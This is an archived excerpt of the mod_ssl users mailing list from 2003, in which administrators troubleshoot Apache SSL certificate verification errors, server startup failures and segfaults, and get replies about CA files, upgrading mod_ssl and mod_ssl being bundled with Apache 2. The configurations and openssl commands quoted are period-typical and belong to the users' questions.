> school seems to have missed the relevance of the renaissance.
> 
> 
> 
> 
> 
> -----Original Message-----
> From: Austin Conger (IT) [mailto:ACONGER@bordersgroupinc.com]
> Sent: 01 April 2003 21:52
> To: modssl-users@modssl.org
> Subject: netscape warning message
> 
> 
> Hi All,
> 
> When I view my ssl pages in Netscape 7.x, I am getting a, 
> Website Certified
> by an Unknown Authority, popup message.
> I am using Apache/2.0.43 and mod_ssl with openssl 0.9.6g running under
> Solaris 8.
> 
> I am assuming its a configuration issue as the certificate is 
> signed by
> Verisign and it works fine in IE.  I am using virtual hosts 
> with separate
> IPs.
> 
> What could be causing this to occur?  What errors might my 
> httpd.conf file
> contain?
> 
> Thanks,
> 
> Austin
> 
> 
> Some of my httpd configuration is as follows:
> 
> Listen 10.0.0.26:80
> Listen 10.0.0.27:80
> 
> ServerName 10.0.0.26:80
> 
> 
> Include conf/ssl.conf
> 
> 
> NameVirtualHost 10.0.0.27
> 
> 
>     DocumentRoot /site/htdocs/vhost
>     RewriteEngine On
>     RewriteRule ^/.* /site/htdocs/vhost/index.html
> 
> 
> 
>     ServerName www.domain2.com
>     ServerPath /domain2/
>     DocumentRoot /site/htdocs/domain2
>     RewriteEngine On
>     RewriteRule ^(/domain2/.*) /site/vhost$1
> 
> 
> 
>     ServerName www.domain3.com
>     ServerPath /domain3/
>     DocumentRoot /site/htdocs/domain3
>     RewriteEngine On
>     RewriteRule ^(/domain3/.*) /site/vhost$1
> 
> 
> 
>     DocumentRoot /site/htdocs/
>     ServerName www.domain.com
>     ServerAdmin admin@domain.com
>     ErrorLog /site/logs/error_log
>     TransferLog /site/logs/access_log
> 
>     SSLEngine on
>     SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> 
>     SSLCertificateFile /usr/local/ssl/certs/verisigned.cert
> 
>     SSLCertificateKeyFile /usr/local/ssl/private/domain.key
> 
>     SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> 
>     CustomLog /site/logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> 
> 
> 
> And the this is my ssl.conf file:
> 
> 
> 
> Listen 10.0.0.26:443
> 
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> 
> SSLPassPhraseDialog  builtin
> 
> SSLSessionCache         dbm:logs/ssl_scache
> SSLSessionCacheTimeout  300
> 
> SSLMutex  file:logs/ssl_mutex
> 
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
> 
> 
> DocumentRoot "/site/htdocs"
> ServerName www.domain.com
> ServerAdmin admin@domain.com
> ErrorLog /site/logs/error_log
> TransferLog /site/logs/access_log
> 
> SSLEngine on
> 
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> 
> SSLCertificateFile /usr/local/ssl/certs/verisigned.cert
> 
> SSLCertificateKeyFile /usr/local/ssl/private/domain.key
> 
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> 
> CustomLog /site/logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> 
> 
> 
> 
> - 
> 
> NOTICE: The information contained in this email and any 
> attachments is 
> confidential and may be legally privileged. If you are not the 
> intended recipient you are hereby notified that you must not use, 
> disclose, distribute, copy, print or rely on this email's content. If 
> you are not the intended recipient, please notify the sender 
> immediately and then delete the email and any attachments from your 
> system.
> 
> RNIB has made strenuous efforts to ensure that emails and any 
> attachments generated by its staff are free from viruses. However, it 
> cannot accept any responsibility for any viruses which are 
> transmitted. We therefore recommend you scan all attachments.
> 
> Please note that the statements and views expressed in this email 
> and any attachments are those of the author and do not necessarily 
> represent those of RNIB.
> 
> RNIB Registered Charity Number: 226227
> 
> Website: http://www.rnib.org.uk 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  3 21:57:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 872412AA02A; Thu,  3 Apr 2003 21:57:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from corpex01.bgpcorp.net (mailhost.bordersgroupinc.com [198.179.227.51])
	by master.modssl.org (Postfix) with ESMTP id C35892AA019
	for ; Thu,  3 Apr 2003 21:57:11 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.6344.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2FA1A.87DAC3B0"
Subject: verify error:num=21
Date: Thu, 3 Apr 2003 14:52:17 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: verify error:num=21
Thread-Index: AcL6GzGAZx3/vwCuSISUhL7fuuU1IQ==
From: "Austin Conger (IT)" 
To: 
Cc: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Austin Conger (IT)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2FA1A.87DAC3B0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi All,
=20
When I submit this command to my Verisign Certificate Secured Site I am =
getting this error.
=20
openssl s_client -connect www.domain.com:443
=20
Its returning these errors:
=20
CONNECTED(00000004)
depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome city/O=3DCompany A =
LLC/OU=3DTerms of use at www.verisign.com/rpa (c)00/CN=3Dwww.domain.com
verify error:num=3D20:unable to get local issuer certificate
verify return:1
depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome city/O=3DCompany A =
LLC/OU=3DTerms of use at www.verisign.com/rpa (c)00/CN=3Dwww.domain.com
verify error:num=3D27:certificate not trusted
verify return:1
depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome city/O=3DCompany A =
LLC/OU=3DTerms of use at www.verisign.com/rpa (c)00/CN=3Dwww.domain.com
verify error:num=3D21:unable to verify the first certificate
verify return:1
etc....
=20
Can anyone identify the reason as to why this is happening? =20
=20
The command I used to create the domain.key file:
/usr/local/ssl/bin/openssl genrsa -des3 -rand =
/var/apache/logs/access_log:/var/log/syslog.5 -out domain.key 1024
=20
I then used this to generate the csr:
/usr/local/ssl/bin/openssl req -new -key doamin.key -out domain.csr
=20
Any help or suggestions would be greatly appreciated! =20
=20
Please see my earlier post "netscape warning message" for additional =
information.
http://marc.theaimsgroup.com/?l=3Dapache-modssl =
 &m=3D104929700518122&w=3D2
=20
Thanks,
=20
Austin

------_=_NextPart_001_01C2FA1A.87DAC3B0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi=20
All,


 


When I =
submit this=20
command to my Verisign Certificate Secured Site I am getting this=20
error.


 


openssl s_client=20
-connect www.domain.com:443

 


Its =
returning these=20
errors:


 


CONNECTED(00000004)
depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome =

city/O=3DCompany A LLC/OU=3DTerms of use at www.verisign.com/rpa=20
(c)00/CN=3Dwww.domain.com
verify error:num=3D20:unable to get local =
issuer=20
certificate
verify return:1
depth=3D0 =
/C=3DUS/ST=3Dmichigan/L=3Dsome=20
city/O=3DCompany A LLC/OU=3DTerms of use at www.verisign.com/rpa=20
(c)00/CN=3Dwww.domain.com
verify error:num=3D27:certificate not =
trusted
verify=20
return:1
depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome=20
city/O=3DCompany A LLC/OU=3DTerms of use at www.verisign.com/rpa=20
(c)00/CN=3Dwww.domain.com
verify error:num=3D21:unable to verify the =
first=20
certificate
verify return:1


etc....


 


Can =
anyone identify=20
the reason as to why this is happening?  


 


The =
command I used=20
to create the domain.key file:


/usr/local/ssl/bin/openssl genrsa -des3 -rand=20
/var/apache/logs/access_log:/var/log/syslog.5 -out domain.key=20
1024


 


I then =
used this to=20
generate the csr:


/usr/local/ssl/bin/openssl req -new -key doamin.key -out=20
domain.csr


 


Any =
help or=20
suggestions would be greatly appreciated!  


 


Please =
see my=20
earlier post "netscape warning message" for additional=20
information.


http://marc.theaimsgroup.com/?l=3Dapache-modssl&m=3D=
104929700518122&w=3D2


 


Thanks,


 


Austin


------_=_NextPart_001_01C2FA1A.87DAC3B0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  3 22:06:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 772422AA02A; Thu,  3 Apr 2003 22:06:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 852712AA019
	for ; Thu,  3 Apr 2003 22:06:36 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 7C8B06E40E7; Thu,  3 Apr 2003 22:06:27 +0200 (CEST)
Date: Thu, 3 Apr 2003 22:06:27 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: verify error:num=21
Message-ID: <20030403200627.GB21506@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Apr 03, 2003 at 02:52:17PM -0500, Austin Conger (IT) wrote:
> Hi All,
>  
> When I submit this command to my Verisign Certificate Secured Site I am getting this error.
>  
> openssl s_client -connect www.domain.com:443
>  
> Its returning these errors:
>  
> CONNECTED(00000004)
> depth=0 /C=US/ST=michigan/L=some city/O=Company A LLC/OU=Terms of use at www.verisign.com/rpa (c)00/CN=www.domain.com
> verify error:num=20:unable to get local issuer certificate
> verify return:1
> depth=0 /C=US/ST=michigan/L=some city/O=Company A LLC/OU=Terms of use at www.verisign.com/rpa (c)00/CN=www.domain.com
> verify error:num=27:certificate not trusted
> verify return:1
> depth=0 /C=US/ST=michigan/L=some city/O=Company A LLC/OU=Terms of use at www.verisign.com/rpa (c)00/CN=www.domain.com
> verify error:num=21:unable to verify the first certificate
> verify return:1
> etc....
>  
> Can anyone identify the reason as to why this is happening?  
>  
Very simple really - openssl is telling you that it can't verify the
certificate because it does not know the CA that it was issued by.
Nothing strange or unexpected in that. Use one of the following to
enable verification:

 -CApath arg   - PEM format directory of CA's
 -CAfile arg   - PEM format file of CA's
 
By default openssl knows no CA's, so you need to get the CA cert
of the signer and use that.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  4 21:28:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id ABB062AA035; Fri,  4 Apr 2003 21:28:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from corpex01.bgpcorp.net (mailhost.bordersgroupinc.com [198.179.227.51])
	by master.modssl.org (Postfix) with ESMTP id 3B1742AA01A
	for ; Fri,  4 Apr 2003 21:28:10 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.6344.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: verify error:num=21
Date: Fri, 4 Apr 2003 14:23:19 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: verify error:num=21
Thread-Index: AcL6HIvYxzDpuF2WTSSgDSSyCGzuZwAvsCEQ
From: "Austin Conger (IT)" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Austin Conger (IT)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

thanks, thats what it was!



-----Original Message-----
From: Mads Toftum [mailto:mads@toftum.dk]
Sent: Thursday, April 03, 2003 3:06 PM
To: modssl-users@modssl.org
Subject: Re: verify error:num=3D21


On Thu, Apr 03, 2003 at 02:52:17PM -0500, Austin Conger (IT) wrote:
> Hi All,
> =20
> When I submit this command to my Verisign Certificate Secured Site I =
am getting this error.
> =20
> openssl s_client -connect www.domain.com:443
> =20
> Its returning these errors:
> =20
> CONNECTED(00000004)
> depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome city/O=3DCompany A =
LLC/OU=3DTerms of use at www.verisign.com/rpa (c)00/CN=3Dwww.domain.com
> verify error:num=3D20:unable to get local issuer certificate
> verify return:1
> depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome city/O=3DCompany A =
LLC/OU=3DTerms of use at www.verisign.com/rpa (c)00/CN=3Dwww.domain.com
> verify error:num=3D27:certificate not trusted
> verify return:1
> depth=3D0 /C=3DUS/ST=3Dmichigan/L=3Dsome city/O=3DCompany A =
LLC/OU=3DTerms of use at www.verisign.com/rpa (c)00/CN=3Dwww.domain.com
> verify error:num=3D21:unable to verify the first certificate
> verify return:1
> etc....
> =20
> Can anyone identify the reason as to why this is happening? =20
> =20
Very simple really - openssl is telling you that it can't verify the
certificate because it does not know the CA that it was issued by.
Nothing strange or unexpected in that. Use one of the following to
enable verification:

 -CApath arg   - PEM format directory of CA's
 -CAfile arg   - PEM format file of CA's
=20
By default openssl knows no CA's, so you need to get the CA cert
of the signer and use that.

vh

Mads Toftum
--=20
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr  5 09:37:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AD2BD2AA043; Sat,  5 Apr 2003 09:37:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 5C9082AA041; Sat,  5 Apr 2003 09:37:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.de [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 6DDD12AA015
	for ; Thu, 20 Mar 2003 17:02:27 +0100 (CET)
Received: (qmail 15536 invoked by uid 0); 20 Mar 2003 16:02:23 -0000
Received: from pD9E48C61.dip.t-dialin.net (HELO pinetik) (217.228.140.97)
  by mail.gmx.net (mp016-rz3) with SMTP; 20 Mar 2003 16:02:23 -0000
From: "Philipp Roos" 
To: 
Subject: Apache crashed if a SSL Engnie is on
Date: Thu, 20 Mar 2003 17:02:06 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philipp Roos" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!
I am activate in one of the virtual hosts the SSLEngine. (SSLEngine on)
then I start the apache
and get a: /usr/sbin/apachectl start: httpd could not be started
in the apache error log is just a: [notice] SIGHUP received.  Attempting to
restart
then there is no apache in the ps -aux list.

I have:
Server version: Apache/1.3.26 (Unix) Debian GNU/Linux
Server built:   Oct 26 2002 09:15:15

OpenSSL 0.9.6g 9 Aug 2002

the libapache-mod-ssl from debain
i don't know the version. i installed it with apt-get.

Some idear's?
thx for ever hint!

greetings Philipp

PS: if i don't activate the SSLEngine the server is running normaly
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr  5 09:37:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9AA052AA03E; Sat,  5 Apr 2003 09:37:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 4E5262AA028; Sat,  5 Apr 2003 09:37:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Received: from smtp.saffron.net (basil.saffron.net [209.123.182.66])
	by master.modssl.org (Postfix) with ESMTP id 00AD02AA01A
	for ; Fri, 21 Mar 2003 10:17:56 +0100 (CET)
Received: (qmail-ldap/ctrl 5428 invoked from network); 21 Mar 2003 09:17:49 -0000
Received: from unknown (HELO saffron.net) (jparsons@saffron.net@[66.92.76.18])
          (envelope-sender )
          by smtp.saffron.net (qmail-ldap-1.03) with DES-CBC3-SHA encrypted SMTP
          for ; 21 Mar 2003 09:17:49 -0000
Date: Fri, 21 Mar 2003 04:18:11 -0500
Subject: Re: mod_ssl/2.8.13 and php AND Problem with 2.8.13 and Solaris 2.6
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v551)
Cc: owen.boyle@swx.com
To: modssl-users@modssl.org
From: Jason Parsons 
Content-Transfer-Encoding: 7bit
Message-Id: <094482E4-5B7E-11D7-8A7B-00039385FC52@saffron.net>
X-Mailer: Apple Mail (2.551)
X-Spam-Status: No, hits=0.0 required=7.0
	tests=none
	version=2.50
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Parsons 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I'm seeing similar problems after an upgrade to mod_ssl 2.8.13 under 
Solaris 2.8.

[Fri Mar 21 04:10:42 2003] [notice] child pid 4241 exit signal 
Segmentation Fault (11)
[Fri Mar 21 04:10:42 2003] [notice] child pid 4248 exit signal 
Segmentation Fault (11)
[Fri Mar 21 04:10:42 2003] [notice] child pid 4240 exit signal 
Segmentation Fault (11)

When accessing an https page using php.  http and php are fine.

Server: Apache/1.3.27 (Unix) FrontPage/5.0.2.2510 mod_perl/1.27 
PHP/4.2.3 mod_ssl/2.8.13 OpenSSL/0.9.7

SunOS hostname 5.8 Generic_108528-19 sun4u sparc SUNW,UltraAX-i2

Let me know if there is any debugging info I can grab for you folks.

   - Jason Parsons
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr  5 12:36:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1E79A2AA03D; Sat,  5 Apr 2003 12:36:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 7A6032AA019
	for ; Sat,  5 Apr 2003 12:36:29 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 663586E4188; Sat,  5 Apr 2003 12:36:24 +0200 (CEST)
Date: Sat, 5 Apr 2003 12:36:24 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl/2.8.13 and php AND Problem with 2.8.13 and Solaris 2.6
Message-ID: <20030405103624.GA17668@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <094482E4-5B7E-11D7-8A7B-00039385FC52@saffron.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <094482E4-5B7E-11D7-8A7B-00039385FC52@saffron.net>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Mar 21, 2003 at 04:18:11AM -0500, Jason Parsons wrote:
> 
> I'm seeing similar problems after an upgrade to mod_ssl 2.8.13 under 
> Solaris 2.8.
> 
> [Fri Mar 21 04:10:42 2003] [notice] child pid 4241 exit signal 
> Segmentation Fault (11)
> [Fri Mar 21 04:10:42 2003] [notice] child pid 4248 exit signal 
> Segmentation Fault (11)
> [Fri Mar 21 04:10:42 2003] [notice] child pid 4240 exit signal 
> Segmentation Fault (11)
> 
> When accessing an https page using php.  http and php are fine.
> 
You need to upgrade to 2.8.14-1.3.27, which was released 21-Mar-2003
to fix a problem similar to what you're describing.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 01:15:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1A10F2AA033; Tue,  8 Apr 2003 01:15:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41507.mail.yahoo.com (web41507.mail.yahoo.com [66.218.93.90])
	by master.modssl.org (Postfix) with SMTP id 3B5372AA024
	for ; Tue,  8 Apr 2003 01:15:55 +0200 (CEST)
Message-ID: <20030407231523.10333.qmail@web41507.mail.yahoo.com>
Received: from [130.86.71.10] by web41507.mail.yahoo.com via HTTP; Mon, 07 Apr 2003 16:15:23 PDT
Date: Mon, 7 Apr 2003 16:15:23 -0700 (PDT)
From: kulkarni veena 
Subject: which version of modssl to be used with apache2.0.44 for solaris os.
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
 I did not find any modssl version for apache 2.0.44
on the modssl website can i use the most recent modssl
build for apache 2.0.44?

Thnaks in advance

-veena


__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - File online, calculators, forms, and more
http://tax.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 01:19:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 35CCC2AA033; Tue,  8 Apr 2003 01:19:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 1F0892AA01F
	for ; Tue,  8 Apr 2003 01:19:11 +0200 (CEST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 933EE35189; Mon,  7 Apr 2003 16:29:05 -0700 (PDT)
Date: Mon, 7 Apr 2003 16:29:05 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: which version of modssl to be used with apache2.0.44 for solaris os.
Message-ID: <20030407232905.GA8841@rawbyte.com>
References: <20030407231523.10333.qmail@web41507.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030407231523.10333.qmail@web41507.mail.yahoo.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> Hi,
>  I did not find any modssl version for apache 2.0.44
> on the modssl website can i use the most recent modssl
> build for apache 2.0.44?

mod_ssl is already included with Apache 2

Cheers

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 03:14:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 618922AA033; Tue,  8 Apr 2003 03:14:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 218542AA01F
	for ; Tue,  8 Apr 2003 03:14:15 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id VAA01928;
	Mon, 7 Apr 2003 21:12:13 -0400
Date: Mon, 7 Apr 2003 21:12:13 -0400 (EDT)
From: "R. DuFresne" 
To: kulkarni veena 
Cc: modssl-users@modssl.org
Subject: Re: which version of modssl to be used with apache2.0.44 for solaris
 os.
In-Reply-To: <20030407231523.10333.qmail@web41507.mail.yahoo.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


A new candidate for frequently asked ;

This 2.0.X version of apache has modssl code built in, read the docs and
the apache home pages.  Also, you might well with to grab 2.0.45 until
2.0.46 is released, which I suspect will not be that far out into the
future....

Thanks,

Ron DuFresne

On Mon, 7 Apr 2003, kulkarni veena wrote:

> Hi,
>  I did not find any modssl version for apache 2.0.44
> on the modssl website can i use the most recent modssl
> build for apache 2.0.44?
> 
> Thnaks in advance
> 
> -veena
> 
> 
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Tax Center - File online, calculators, forms, and more
> http://tax.yahoo.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 03:23:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 363012AA033; Tue,  8 Apr 2003 03:23:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
